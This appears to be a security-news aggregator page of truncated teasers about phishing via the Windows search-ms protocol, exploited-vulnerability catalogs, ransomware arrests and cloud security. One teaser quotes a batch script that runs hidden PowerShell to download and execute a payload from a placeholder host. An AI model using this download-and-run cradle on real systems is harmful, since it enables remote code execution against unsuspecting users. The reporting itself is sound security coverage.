Phishing emails abuse Windows search protocol to push malicious scripts
A new phishing campaign uses HTML attachments that abuse the Windows search protocol (search-ms URI) to push batch files hosted on...
Read more →A new phishing campaign uses HTML attachments that abuse the Windows search protocol (search-ms URI) to push batch files hosted on...
Read more →CISA adds Arm Mali GPU Kernel Driver, PHP bugs to its Known Exploited Vulnerabilities catalog Pierluigi Paganini June 12, 2024...
Read more →The second Jira website I discovered was surprisingly harder to exploit. It didn’t give me the verbose errors like the...
Read more →Kaspersky researchers discovered widespread vulnerabilities in biometric terminals developed by ZKTeco, which are known to be deployed internationally. These flaws...
Read more →The Australian Digital Health Agency has claimed $1.04 million in service credits from Accenture, the outsourced operator of My Health...
Read more →Ukraine Police arrested a hacker who developed a crypter used by Conti and LockBit ransomware operation Pierluigi Paganini June 12,...
Read more →Defence is set to convert a secret advanced analytics project it has been researching into an actual operational capability. The...
Read more →The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))”...
Read more →In a major victory against ransomware operators, Ukrainian police have apprehended a Ukrainian national suspected of aiding the notorious ransomware...
Read more →The Black Basta ransomware gang may have exploited a Windows privilege escalation vulnerability as a zero-day before it was patched,...
Read more →Rocket maker SpaceX and its CEO Elon Musk were sued by eight engineers who say they were illegally fired for...
Read more →Amazon Web Services (AWS) has introduced FIDO2 passkeys as a new method for multi-factor authentication (MFA) to enhance account security...
Read more →